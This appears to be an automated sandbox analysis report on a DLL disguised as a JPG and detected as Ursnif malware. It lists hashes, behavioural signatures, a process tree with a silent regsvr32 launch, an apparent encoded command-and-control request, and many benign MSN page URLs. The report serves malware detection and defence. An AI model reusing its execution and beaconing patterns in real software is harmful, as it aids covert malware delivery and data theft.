Loading ...

Play interactive tourEdit tour

Analysis Report pan0ramic0.jpg.dll

Overview

General Information

Sample Name:pan0ramic0.jpg.dll
Analysis ID:343092
MD5:86b877eeaf0482b5e1439ed80a82fffb
SHA1:26c46504c293311f0403bf699f2ddc6cacb63c5b
SHA256:8baffba2ed672607e1535dcbfcc47a264e7b8941f63cf181814d7365e8627d05
Tags:ursnif

Most interesting Screenshot:

Detection

Ursnif
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
Machine Learning detection for sample
PE file has a writeable .text section
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6388 cmdline: loaddll32.exe 'C:\Users\user\Desktop\pan0ramic0.jpg.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • regsvr32.exe (PID: 6396 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pan0ramic0.jpg.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • cmd.exe (PID: 6404 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 6444 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6544 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 4548 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6312 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.298876856.0000000005928000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.298930970.0000000005928000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.298914793.0000000005928000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000002.628060995.0000000005928000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.298824563.0000000005928000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Machine Learning detection for sampleShow sources
            Source: pan0ramic0.jpg.dllJoe Sandbox ML: detected
            Source: 1.2.regsvr32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: pan0ramic0.jpg.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_04F6523C
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: global trafficHTTP traffic detected: GET /images/pWO7gR1H/D7HcuyFwtqQyc2f7q30Sd_2/FpvO8g9Yt5/2sg_2BRDopkySLofc/dkvmiGq3mHQj/9cyQdhK_2B9/azaTrmORrQeoXS/bACWS0fxUaX55PQ_2Fz1L/SGv7j6lLaBvkjGGO/vKK54z_2Boqw2T6/kG6Y8SdQIYEyKDgkqr/xQr9PXAUv/_2FGBrMyPIWHK67_2Btq/cGu_2BgqH_2BAaZKhVo/ScaI1GsuG5Cl_2/FdCVaSy.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: de-ch[1].htm.5.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: de-ch[1].htm.5.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.5.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: de-ch[1].htm.5.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.5.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: auction[1].htm.5.drString found in binary or memory: http://popup.taboola.com/german
            Source: ~DF15357C5499AE2212.TMP.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: pan0ramic0.jpg.dllString found in binary or memory: http://www.symantec.com
            Source: de-ch[1].htm.5.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: auction[1].htm.5.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
            Source: iab2Data[1].json.5.drString found in binary or memory: https://bealion.com/politica-de-cookies
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: iab2Data[1].json.5.drString found in binary or memory: https://channelpilot.co.uk/privacy-policy
            Source: de-ch[1].htm.5.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
            Source: de-ch[1].htm.5.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.5.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: de-ch[1].htm.5.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
            Source: ~DF15357C5499AE2212.TMP.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.5.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.5.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.5.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: ~DF15357C5499AE2212.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: ~DF15357C5499AE2212.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: iab2Data[1].json.5.drString found in binary or memory: https://docs.prebid.org/privacy.html
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: auction[1].htm.5.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: de-ch[1].htm.5.drString found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: de-ch[1].htm.5.drString found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
            Source: iab2Data[1].json.5.drString found in binary or memory: https://listonic.com/privacy/
            Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1611306996&amp;rver
            Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1611306996&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/logout.srf?ct=1611306997&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1611306996&amp;rver=7.0.6730.0&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: de-ch[1].htm.5.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.5.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.5.drString found in binary or memory: https://outlook.com/
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: de-ch[1].htm.5.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
            Source: de-ch[1].htm.5.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
            Source: iab2Data[1].json.5.drString found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
            Source: iab2Data[1].json.5.drString found in binary or memory: https://quantyoo.de/datenschutz
            Source: iab2Data[1].json.5.drString found in binary or memory: https://related.hu/adatkezeles/
            Source: ~DF15357C5499AE2212.TMP.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
            Source: de-ch[1].htm.5.drString found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
            Source: de-ch[1].htm.5.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
            Source: de-ch[1].htm.5.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
            Source: de-ch[1].htm.5.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
            Source: imagestore.dat.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYZkP.img?h=368&amp
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
            Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://support.skype.com
            Source: de-ch[1].htm.5.drString found in binary or memory: https://twitter.com/
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://twitter.com/i/notifications;Ich
            Source: de-ch[1].htm.5.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1
            Source: de-ch[1].htm.5.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.admo.tv/en/privacy-policy
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=htt
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.brightcom.com/privacy-policy/
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.gadsme.com/privacy-policy/
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/
            Source: ~DF15357C5499AE2212.TMP.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/aus-angst-vor-mutierten-viren-maskenpflicht-f%c3%bcr-z%c3%bcrch
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/auto-der-milit%c3%a4rpolizei-kollidiert-mit-tram/ar-BB1cZe9U?oc
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/die-stadt-z%c3%bcrich-schnappt-sich-einen-begehrten-kita-stando
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/feuerwehr-sperrt-teile-der-altstadt-wegen-dachlawinen/ar-BB1cXQ
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/ich-habe-mehrere-kritische-man%c3%b6ver-mit-autofahrern-erlebt/
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/in-schwamendingen-soll-die-gr%c3%b6sste-z%c3%bcrcher-schulanlag
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/kommentar-es-braucht-keine-staatlichen-kitas-in-der-stadt-z%c3%
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/nach-dem-flockdown-parkpl%c3%a4tze-dienen-der-stadt-z%c3%bcrich
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/nach-razzia-gegen-mutmassliche-neonazis-rechtsextreme-junge-tat
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/twitter-sperrt-accounts-von-svp-kantonsrat-claudio-schmid/ar-BB
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.remixd.com/privacy_policy.html
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.skype.com/
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.skype.com/de
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.skype.com/de/download-skype
            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
            Source: de-ch[1].htm.5.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
